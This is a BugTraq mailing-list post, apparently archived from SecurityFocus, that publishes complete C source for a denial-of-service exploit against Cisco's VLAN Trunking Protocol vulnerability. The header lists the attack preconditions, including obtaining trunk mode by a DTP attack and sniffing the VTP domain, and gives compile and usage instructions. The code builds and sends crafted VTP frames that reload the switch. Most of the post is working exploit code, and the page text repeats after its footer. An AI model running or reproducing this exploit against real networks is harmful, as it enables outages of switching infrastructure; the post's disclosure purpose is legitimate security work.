BugTraq
Back to list
|
Post reply
DoS code for Cisco VLAN Trunking Protocol Vulnerability
Jan 14 2009 05:07AM
showrun lee gmail com
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
*
*vulerability discription:
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
*
*To Known:
* 1.the switch must in Server/Client Mode.
* 2.the port ,attacker connected,must be in trunk Mode.
* Cisco Ethernet ports with no configuration are not
* in trunk.but trunk mode can be obtained through DTP
* attack by Yersinia.
* 3.you must known the vtp domain,this can be sniffed
* 4.some codes are from Yersinia.
*
*Result:
* switch reload.
*
*
*Compile:
* gcc -o vtp `libnet-config --libs` vtp.c
*
*Usage:vtp -i <interface> -d <vtp_domain>
*
*Contact: showrun.lee[AT]gmail.com
*http://sh0wrun.blogspot.com/
*/
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
u_int32_t revision;
u_int32_t updater;
u_int8_t timestamp[VTP_TIMESTAMP_SIZE];
u_int8_t md5[16];
};
struct vtp_subset {
u_int8_t version;
u_int8_t code;
u_int8_t seq;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
u_int32_t revision;
};
void usage( char *s) {
printf("%s -i <interface> -d <vtp domain>\n",s);
exit (1);
}
int main( int argc, char *argv[] )
{
int opt,k=0;
extern char *optarg;
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
struct libnet_ether_addr *mymac;
char *device;
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;
// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
device=malloc(strlen(optarg));
strcpy(device,optarg);
k=1;
break;
case 'd':
domain=malloc(strlen(optarg));
strcpy(domain,optarg);
break;
default: usage(argv[0]);
}
}
if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);}
//init libnet
lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}
mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len);
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
vtp_summ->dom_len = strlen(domain);
memcpy(vtp_summ->domain,domain,strlen(domain));
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len);
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
vtp_sub->dom_len = strlen(domain);
memcpy(vtp_sub->domain,domain,strlen(domain));
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
}
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
*
*vulerability discription:
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
*
*To Known:
* 1.the switch must in Server/Client Mode.
* 2.the port ,attacker connected,must be in trunk Mode.
* Cisco Ethernet ports with no configuration are not
* in trunk.but trunk mode can be obtained through DTP
* attack by Yersinia.
* 3.you must known the vtp domain,this can be sniffed
* 4.some codes are from Yersinia.
*
*Result:
* switch reload.
*
*
*Compile:
* gcc -o vtp `libnet-config --libs` vtp.c
*
*Usage:vtp -i <interface> -d <vtp_domain>
*
*Contact: showrun.lee[AT]gmail.com
*http://sh0wrun.blogspot.com/
*/
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
u_int32_t revision;
u_int32_t updater;
u_int8_t timestamp[VTP_TIMESTAMP_SIZE];
u_int8_t md5[16];
};
struct vtp_subset {
u_int8_t version;
u_int8_t code;
u_int8_t seq;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
u_int32_t revision;
};
void usage( char *s) {
printf("%s -i <interface> -d <vtp domain>\n",s);
exit (1);
}
int main( int argc, char *argv[] )
{
int opt,k=0;
extern char *optarg;
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
struct libnet_ether_addr *mymac;
char *device;
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;
// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
device=malloc(strlen(optarg));
strcpy(device,optarg);
k=1;
break;
case 'd':
domain=malloc(strlen(optarg));
strcpy(domain,optarg);
break;
default: usage(argv[0]);
}
}
if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);}
//init libnet
lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}
mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len);
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
vtp_summ->dom_len = strlen(domain);
memcpy(vtp_summ->domain,domain,strlen(domain));
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len);
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
vtp_sub->dom_len = strlen(domain);
memcpy(vtp_sub->domain,domain,strlen(domain));
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
}
[ reply ]